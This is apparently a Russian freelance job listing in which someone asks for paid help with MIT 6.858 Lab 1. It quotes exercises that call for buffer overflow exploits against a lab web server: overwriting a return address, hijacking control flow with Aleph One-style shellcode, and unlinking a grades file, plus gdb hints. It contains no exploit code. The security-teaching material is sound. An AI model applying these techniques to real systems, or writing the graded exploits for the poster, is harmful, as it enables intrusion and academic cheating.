Программирование — работа в Москве

Язык программирования: Python Для учебы Помощь в выполнении задания 6.858 Lab 1: Exercise 2. Pick two buffer overflows out of what you have found for later exercises (although you can change your mind later, if you find your choices are particularly difficult to exploit). The first must overwrite a return address on the stack, and the second must overwrite some other data structure that you will use to take over the control flow of the program. Write exploits that trigger them. You do not need to inject code or do anything other than corrupt memory past the end of the buffer, at this point. Verify that your exploit actually corrupts memory, by either checking the last few lines of dmesg | tail, using gdb, or observing that the web server crashes. Provide the code for the exploits in files called exploit-2a.py and exploit-2b.py, and indicate in answers.txt which buffer overflow each exploit triggers. If you believe some of the vulnerabilities you have identified in Exercise 1 cannot be exploited, choose a different vulnerability. Exercise 3. Starting from one of your exploits from Exercise 2, construct an exploit that hijacks control flow of the web server and unlinks /home/httpd/grades.txt. Save this exploit in a file called exploit-3.py. Explain in answers.txt whether or not the other buffer overflow vulnerabilities you found in Exercise 1 can be exploited in this manner. Verify that your exploit works; you will need to re-create /home/httpd/grades.txt after each successful exploit run. Suggestion: first focus on obtaining control of the program counter. Sketch out the stack layout that you expect the program to have at the point when you overflow the buffer, and use gdb to verify that your overflow data ends up where you expect it to. Step through the execution of the function to the return instruction to make sure you can control what address the program returns to. The next, stepi, info reg, and disassemble commands in gdb should prove helpful. Once you can reliably hijack the control flow of the program, find a suitable address that will contain the code you want to execute, and focus on placing the correct code at that address---e.g. a derivative of Aleph One's shell code. Note: SYS_unlink, the number of the unlink syscall, is 10 or '\n' (newline). Why does this complicate matters? How can you get around it?